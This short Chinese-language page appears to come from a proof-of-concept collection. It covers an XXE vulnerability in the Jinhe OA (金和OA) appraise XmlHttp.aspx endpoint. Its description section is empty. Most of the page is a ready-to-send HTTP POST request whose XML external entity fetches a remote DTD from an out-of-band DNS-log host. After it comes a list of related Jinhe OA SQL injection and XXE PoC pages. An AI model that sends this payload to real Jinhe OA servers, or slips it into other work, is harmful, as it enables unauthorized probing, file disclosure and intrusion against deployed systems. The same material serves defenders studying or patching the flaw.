金和OA appraise-XmlHttp XXE漏洞

漏洞描述

PoC代码

POST /c6/Jhsoft.Web.appraise/XmlHttp.aspx/ HTTP/1.1
Host: 
Content-Type: application/xml

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root [
<!ENTITY % remote SYSTEM "http://xxe.dnslog.pt/xxe_test">
%remote;]>
<root/>

相关漏洞推荐

• 金和OA ArchivesRoomUpdate.aspx SQL注入漏洞
• 金和OA ArchivesShowAcceptAip SQL注入漏洞
• 金和OA ArchivesRoomDeptSave.aspx 存在XML注入漏洞
• 金和OA ArchivesInfoAskAip.aspx SQL注入漏洞
• 金和OA ArchivesInfoSendAip.aspx SQL注入漏洞
• 金和OA ArchivesAdviceAdd.aspx 存在SQL注入漏洞
• 金和OA ArchivesInfoAcceptAip.aspx SQL注入漏洞
• 金和OA ArchivesInfoAsk.aspx SQL注入漏洞
• 金和OA ArchivesDossierExec.aspx SQL注入漏洞
• POC 金和OA ArchivesAdviceInsert.aspx SQL注入漏洞
• 金和OA ArchivesCatalogDocPrint.aspx SQL注入漏洞
• POC 金和OA ArchivesAdviceAdd.aspx SQL注入漏洞
• 金和OA acceptvalue.aspx XXE漏洞